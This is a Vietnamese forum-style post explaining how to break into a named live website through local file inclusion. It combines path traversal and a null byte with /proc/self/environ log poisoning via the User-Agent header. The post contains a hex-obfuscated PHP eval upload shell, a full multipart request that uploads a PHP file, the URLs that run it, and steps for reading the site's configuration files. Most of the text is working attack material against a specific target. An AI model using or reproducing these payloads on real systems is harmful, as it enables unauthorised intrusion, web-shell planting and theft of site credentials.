Mình xin phép được định hướng tình huống này cho các bạn như sau
http://duoihinhbatchu.vn/index.php?act=../../../../../../../../../../../../../proc/self/environ% 00
Ở đây file environ có thể inject qua User-Agent
Nhưng ở đây lại disable các hàm system call Exec,system,passthru,shell_exec,escapeshellarg,escapeshellcmd,proc_close,proc_open,dl,popen,show_sourceLên không thể sử dụng wget để up shell remoter được
Lên mình mới thử tìm cách send 1 POST có dạng
Url
http://duoihinhbatchu.vn/index.php?act=../../../../../../../../../../../../../proc/self/environ% 00&do=load
HTTP HeadersNhưng điều đáng buồn là up lên thì bị error 500
Host: duoihinhbatchu.vn
User-Agent: <?eval("\x20\x69\x66\x20\x28\x24\x5f\x52\x45\x51\x55\x45\x53\x54\x5b\x27\x64\x6f\x27\x5d\x3d\x3d\x27\x6c\x6f\x61\x64\x27\x29\x7b\xd\xa\x20\x24\x66\x69\x6c\x65\x73\x20\x3d\x20\x40\x24\x5f\x46\x49\x4c\x45\x53\x5b\x22\x66\x69\x6c\x65\x73\x22\x5d\x3b\xd\xa\x20\x69\x66\x28\x24\x66\x69\x6c\x65\x73\x5b\x22\x6e\x61\x6d\x65\x22\x5d\x20\x21\x3d\x20\x27\x27\x29\x7b\xd\xa\x20\x24\x66\x75\x6c\x6c\x70\x61\x74\x68\x20\x3d\x20\x24\x5f\x52\x45\x51\x55\x45\x53\x54\x5b\x22\x70\x61\x74\x68\x22\x5d\x2e\x24\x66\x69\x6c\x65\x73\x5b\x22\x6e\x61\x6d\x65\x22\x5d\x3b\xd\xa\x20\x69\x66\x28\x6d\x6f\x76\x65\x5f\x75\x70\x6c\x6f\x61\x64\x65\x64\x5f\x66\x69\x6c\x65\x28\x24\x66\x69\x6c\x65\x73\x5b\x27\x74\x6d\x70\x5f\x6e\x61\x6d\x65\x27\x5d\x2c\x24\x66\x75\x6c\x6c\x70\x61\x74\x68\x29\x29\x20\x65\x63\x68\x6f\x20\x22\x3c\x68\x31\x3e\x3c\x61\x20\x68\x72\x65\x66\x3d\x27\x24\x66\x75\x6c\x6c\x70\x61\x74\x68\x27\x3e\x4f\x4b\x2d\x43\x6c\x69\x63\x6b\x20\x68\x65\x72\x65\x21\x3c\x2f\x61\x3e\x3c\x2f\x68\x31\x3e\x22\x3b\xd\xa\x20\x7d\xd\xa\x20\x64\x69\x65\x28\x27\x3c\x66\x6f\x72\x6d\x20\x6d\x65\x74\x68\x6f\x64\x3d\x50\x4f\x53\x54\x20\x65\x6e\x63\x74\x79\x70\x65\x3d\x22\x6d\x75\x6c\x74\x69\x70\x61\x72\x74\x2f\x66\x6f\x72\x6d\x2d\x64\x61\x74\x61\x22\x20\x61\x63\x74\x69\x6f\x6e\x3d\x22\x22\x3e\xd\xa\x20\x3c\x69\x6e\x70\x75\x74\x20\x74\x79\x70\x65\x3d\x74\x65\x78\x74\x20\x6e\x61\x6d\x65\x3d\x70\x61\x74\x68\x3e\xd\xa\x20\x3c\x69\x6e\x70\x75\x74\x20\x74\x79\x70\x65\x3d\x22\x66\x69\x6c\x65\x22\x20\x6e\x61\x6d\x65\x3d\x22\x66\x69\x6c\x65\x73\x22\x3e\x3c\x69\x6e\x70\x75\x74\x20\x74\x79\x70\x65\x3d\x73\x75\x62\x6d\x69\x74\x20\x76\x61\x6c\x75\x65\x3d\x22\x55\x70\x22\x3e\x3c\x2f\x66\x6f\x72\x6d\x3e\x27\x29\x3b\xd\xa\x20\x7d\xd\xa");?>
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://duoihinhbatchu.vn/index.php?act=../../../../../../../../../../../../../proc/self/environ&do=load
Content-Type: multipart/form-data; boundary=---------------------------3727316425797547791100469184
Content-Length: 78754
POST Data
-----------------------------3727316425797547791100469184\r\n
Content-Disposition: form-data; name="path"\r\n
\r\n
\r\n
-----------------------------3727316425797547791100469184\r\n
Content-Disposition: form-data; name="files"; filename="xgr.php"\r\n
Content-Type: application/x-httpd-php\r\n
\r\n
<? phpinfo(); ?>\r\n
-----------------------------3727316425797547791100469184--\r\n
http://duoihinhbatchu.vn/webadmin.php
http://duoihinhbatchu.vn/xgr.php
Run
http://duoihinhbatchu.vn/index.php?act=../xgr.php% 00
http://duoihinhbatchu.vn/index.php?act=../webadmin.php% 00
Cách đọc file config như sau
gửi 1 GET request như sau
view source lên
<!--?php
define('_VALID_NVB','1');
define('_VALID_NVB','1');
include("initcms.php");
if($CONFIG['active_site']==0){
header("Location: index4.php?act=error");
}
elseif($CONFIG['active_site']==1){
$act=$_GET['act'];
if($act=='' || $act==null || $act=='home') $act='home';
$act="modules/$act.php";
include("modules/header.php");
include($act);
include("modules/footer.php");
}
include("endcms.php");
?-->
Đọc tiếp file initcms.php , và conf.php chính là file cấu hình của trang web trên